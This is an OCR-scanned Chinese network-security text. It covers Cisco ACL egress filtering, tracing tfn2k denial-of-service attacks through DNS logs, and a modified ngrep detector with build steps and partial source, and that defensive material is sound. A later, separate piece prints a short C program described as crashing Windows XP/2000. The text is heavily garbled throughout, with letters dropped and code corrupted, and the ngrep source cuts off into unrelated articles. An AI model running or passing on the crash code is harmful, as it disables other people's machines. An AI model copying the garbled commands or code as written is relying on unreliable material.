c36(X)(config-if)#ipaccess-group1OOout

通過顯示access-ist來確認訪問權限已經生效：

c3600#shoaccess-ists100

ExtendedIPaccessist1(X)

pcrmitip55any(5matches)

denyipanyany(25202matches)

對于應該使用向內的包過濾還是使用向外的包過濾一直存在著爭論。RFC2267建議在

全球范圍的互連網上使用向內過濾的機制，但是這樣會帶來很多的麻煩，在中等級別的路由

器上使用訪問控制列表不會帶來太大的麻煩，但是已經滿載的骨干路由器上會受到明顯的威

脅。

另一方面，ISP如果使用向外的包過濾措施會把過載的流量轉移到一些不太忙的設備

上。ISP也不關心消費者是否在他們的邊界路由器上使用這種技術。當然，這種過濾技術也

并不是萬無一失的，這依賴于管理人員采用的過濾機制。

我們經常會聽到設備銷售或集成商這樣的推脫之詞，他們總是說使用AC會導致路由器

和網絡性能的下降。AC確實會降低路由器的性能并加重CPU的負載，但這是微乎其微的。

我們曾經在Cisco2600和3600系列路由器上作過實驗：

以下是不使用和使用AC時的對照表：

TestSpeedw/oAC(Mbps)w/AC(Mbps)w/oAC(totatime)w/AC(totatime)change

Cisco2600100Mbps-》100MbpsFietransfers36.17Mbps35.46Mbps88.59O.22.5O

Cisco360010Mbps410MbpsFietransfers7.95Mbps8.0Mbps3973950.30

使用的路由器配置如下：

Cisco3640(64MBRAM,R4700processor,IOSv12.0.5T)

Cisco2600(l28MBRAM,MPC860processor,IOSv12.0.5T)

由表我們可以看出，在使用AC前后對路由器性能的影響并不是很大.

使用DNS來跟蹤匿名攻擊

也許大家仍舊保存著僥幸心理，認為這些互連網上給我們帶來無數麻煩DoS漏洞或許

隨著路由器包過濾，網絡協議升級到IPv6或者隨時的遠程響應等手段變得越來越不重要。

但從一個具有責任感的網管的觀點來看，我們的目標并不是僅僅阻止拒絕服務攻擊，而是要

追究到攻擊的發起原因及操作者。

當網絡中有人使用假冒了源地址的工具(如tfn2k)時，我們雖然沒有現成的工具來確

認它的合法性，但我們可以通過使用DNS來對其進行分析：

假如攻擊者選定了目標他必須首先發送一個DNS請求來解析這個域名，通常那些攻擊

工具工具會自己執行這一步，調用gethostbyname()函數或者相應的應用程序接口，也就是說,

在攻擊事件發生前的DNS請求會提供給我們一個相關列表，我們可以利用它來定位攻擊者。

使用現成工具或者手工讀取DNS請求日志,來讀取DNS可疑的請求列表都是切實可行

的，然而，它有三個主要的缺點：

攻擊者一般會以本地的DNS為出發點來對地址進行解析查詢，因此我們查到的DNS

請求的發起者有可能不是攻擊者本身，而是他所請求的本地DNS服務器。盡管這樣，如果

攻擊者隱藏在一個擁有本地DNS的組織內，我們就可以把該組織作為查詢的起點。

攻擊者有可能已經知道攻擊目標的IP地址，或者通過其他手段(host,ping)知道了目

標的IP地址,亦或是攻擊者在查詢到IP地址后很長一段時間才開始攻擊，這樣我們就無法

從DNS請求的時間段上來判斷攻擊者(或他們的本地服務器)。

DNS對不同的域名都有一個卻省的存活時間，因此攻擊者可以使用存儲在DNS緩存中

的信息來解析域名。為了更好做出詳細的解析記錄，您可以把DNS卻省的TT時間縮小，

但這樣會導致DNS更多的去查詢所以會加重網絡帶寬的使用。

在許多情況下，只要您擁有足夠的磁盤空間，記錄所有的DNS請求并不是一種有害的

做法。在BIND8.2中做記錄的話，可以在named.conf中假如下面的幾行：

ogging{channerequestog{fie"dns.og";};

catcgoryquerics{rcqucstog;};};

使用ngrep來處理tfn2k攻擊

根據使用DNS來跟蹤tfn2k駐留程序的原理，現在已經出現了稱為ngrep的實用工具。

經過修改的ngrep(參見附錄)可以監聽大約五種類型的tfn2k拒絕服務攻擊

(targa3,SYNfood,UDPfood,ICMPfood和smurf),它還有一個循環使用的緩存用來記錄DNS

和ICMP請求。如果ngrep發覺有攻擊行為的話，它會將其緩存中的內容打印出來并繼續記

錄ICMP回應請求。假如攻擊者通過ping目標主機的手段來抑定攻擊目標的話，在攻擊過

程中或之后記錄ICMP的回應請求是一種捕獲粗心的攻擊者的方法。由于攻擊者還很可能使

用其他的服務來核實其攻擊的效果(例如web),所以對其他的標準服務也應當有盡量詳細

的日志記錄。

還應當注意，ngrep采用的是監聽網絡的手段，因此，ngrep無法在交換式的環境中使

用。但是經過修改的ngrep可以不必和你的DNS在同一個網段中，但是他必須位于一個可

以監聽到所有DNS請求的位置。經過修改的ngrep也不關心目標地址，您可以把它放置在

DMZ網段，使它能夠檢查橫貫該網絡的而2k攻擊。從理論上講，它也可以很好的檢測出

對外的tfn2k攻擊。

運行ngrep,您將看到：

[root@ughnasadngrep]#./ngrep

NgrepwithTFNdetectionmodificationsbywiretrip/

WatchingDNSserver:

interface:ethO(l/)

從這里開始ngrep將監聽tfn2k攻擊，如果檢測到攻擊,ngrep將在屏幕上打印：

SunJan917:30:012000

ATFN2KUDPattackhasbeendetected!

ast(5000)DNSrcquests:

^istofIPsthatmadeDNSrequests,uptoDNS_REQUEST_MAXength^

ast(lOOO)ICMPechorequests(pings):

(istonPsthatmadeICMPechorequests,uptoICMP_REQUEST_MAXength》

IncomingreaiimelCMPechorequests(pings):

<aICMPechorequestssincetheattackwasdetected^

以上的列表并不是唯一的,可以對它進行調整讓他不僅顯示是誰請求，而且請求多少次,

頻率為多少等等。在ICMPfood事件中，ICMP回應請求的報告中將不包括做為tfn2kfood一

部分的ICMP包。Ngrep還可以報告檢測出來的除smurf之外的攻擊類型

(TARGA,UDRSYN.ICMP等)。混合式的攻擊在缺省情況下表現為ICMP攻擊，除非你屏

蔽了向內的ICMP回應請求，這樣它就表現為UDP或SYN攻擊。這些攻擊的結果都是基本

類似的。

附錄-Ngrep.cwithtfh2kdetection

以下的代碼在使用前應當更改一些參數。

#defineDNS_REQUEST_MAX5000

#defincICMP_REQUEST_MAX1000

通知ngrep最大的請求跟蹤數(在檢測攻擊之前)。傳輸較為繁忙的網站應當增加這一

數值(網絡流量較為繁忙的網站DNS的請求數最好在10,000,而ICMP請求為2000.3000)

#dcfincFOOD_THRESHOD20

用在10秒中內有多少同一類型的攻擊包來確認為真正的攻擊。數目設計的越大，程序

報受攻擊的可能性就越小。假如您老是收到錯誤的警報，那么您應當增加一下這個數值。

#dcfincDNS_SERVER_IP,t"

Ngrep通過監視DNS服務器的53端口的UDP包來跟蹤向內的DNS請求(只有UDP)。

因此，ngrep需要知道您的DNS服務器的IP地址。

我們的設備可能會有多個DNS服務器，但我們認為對一臺DNS服務器的支持足以證明

這項技術的能力。

#defineTT_THRESHOD150

lfn2kSYNfood攻擊使用的TT值通常在200-255的范圍內。估計到攻擊者與目標主機之

間不止50跳，因此我們可以只查找TT時間高于150的包。假如您相信攻擊者在50跳左右,

那么您可以對TT的限制進行一下更改。

編譯更改過的ngrep

編譯和安裝都非常簡單。您僅需要使用以下之一來取代ngrep.c文件。處于方便起見，

我們可以詳細說明。

這段代碼只是在RedHat6.1和Mandrake6.5inux上測試過。

首先您需要在下載ngrep,我們測試的是1.35版。

然后在我們使用的是0.40版。

把文件放在臨時文件夾里并解包，tarxvzfibpcap.lar.Z然后進行編譯

cdibpcap-0.4;./configure;make;makeinsta;makeinsta-inc

假如您遇到了困難，可以參見在ibpc叩。4目錄里的README或INSTA文件。根據我

們實驗的經驗，如果/usr/oca/incude和/usr/oca/incude/net目錄在inux系統中不存在的話，安

裝會失敗。加入您在安裝時遇到了pcap.h或bpf.h的錯誤時你可以運行

mkdir/usr/oca/incudc:mkdir/usr/oca/incudc/net然后重新運行'makcinsta-inc'。然后我們需要

編譯ngrep(使用我們修改過的版本)。首先解包

tarxvzfngrep-1.35.tar.gz

然后進行配置

cdngrep;./configure

然后把ngrep.c復制到ngrep目錄里。你可以覆蓋也可以備份原始的ngrep.c文件。在這

里，您應當回顧在修改過的ngrep.c里的配置，至少您應當把DNS_SERVER_IP更改為您所

使用的DNS的地址。更改完畢后你就可以運行，make)這樣就建立了ngrep應用程序。

Modifiedngrep.csourcecode

/*thiscodeisavaiabcfbrdownoadfroin/*

*$Id:ngrep.c,v1.351999/10/1316:44:16jpr5Exp$*/

/*TFNdetectioncodeaddedbyRainForestPuppy/rfp(a>

andNightAxis/na@wiretrip,net*/

/?^^^/iic/*ATFNdelectiondefines****1******5*******4^*****5*41*****/

Z*hownianyDNSandICMPrequeststotrack*/

#dcfincDNS_REQUEST_MAX5000

#defineICMP_REQUEST_MAX1000

/*fbodthreshodismatchesper1Oseconds*/

#defincFOOD_THRESHOD20

/*IPofyourDNSserver*/

#defineDNS_SERVER」P”"

/*TFNsynusesttbctwccn200-255.Assumingcss(han50hops,

fagstuffwithtt>TT_THRESHOD(othercriteraareused

aswe)*/

#defincTT_THRESHOD150

/**************************************************************/

#incude<stdib.h>

#incudc<string.h>

#incude<signa.h>

#ifdeflNUX

#incudc<getopt.h>

#endif

#ifdefined(BSD)

如何用9行代碼干掉WindowsXP,2000

微軟一直聲稱WindowsXP多么多么穩定可靠，但日前一位名為MasaruTsuchiyama(留

在程序下方，所以應該是他的昵稱)外國編程愛好者刊出了一小段C語言代碼。這一只有9

行的小程序如果在WindowsXP/2000下運行，則可導致系統完全崩潰，并重新啟動。但此程

序對其他版本的Windows沒有任何影響。這一產生無限循環輸出的小程序的代碼如下：

#incude

intmain(void)

printf("hungup\t\t\b\b\b\b\b\b");

print("hungup\t\t\b\b\b\b\b\b");}

retumO;}

如果去掉Prim語句，此程序還會導致NT4.0系統出現藍屏錯誤。

用VB編寫入侵監聽程序

上網的時候很容易遭到探測，一般探測你個人的入侵者技術不會高明到哪里去。所以根

本不能稱上黑客，所以本文就用入侵者來代替。他們對普通網民的掃描可以是多端口單IP

的掃描或者多IP單端口掃描。前者是通過一些IP工具來取得你的IP,然后嘗試利用端口掃

描獲取你的信息，看你的計算機有沒有預先中了木馬。然后通過網上的木馬端口列表，來獲

得木馬名稱。用相應的客戶端軟件來連接到你的計算機。從而獲得密碼、以及你的秘密信息、。

后者則是通過利用如SuperScan等可以大范圍掃描IP的軟件，掃描打開特定端口的機器。

比如，可以掃描打開7626端口的機器，看對方是否中了冰河。然后，入侵者就用客戶端連

接到服務器從而入侵你的計算機。

這些掃描是簡單的TCP的Connect掃描。所以無法避開防火墻的追蹤。網民就可以利

用天網等防火墻軟件來狹取對方的IP。相信很多DIY迷或者編程愛好者總是想擁有屬于自

己的類似的工具。本文就給你講述如何用VB來獲得探測你的入侵者的IP地址，然后……

我可沒有教你用藍屏炸彈或者蝸牛炸彈去炸它哦。畢竟，我們沒有入侵者的野心，本程序還

可以讓你監聽80端口，來察看對方對你進行的常規掃描。要看懂本文，你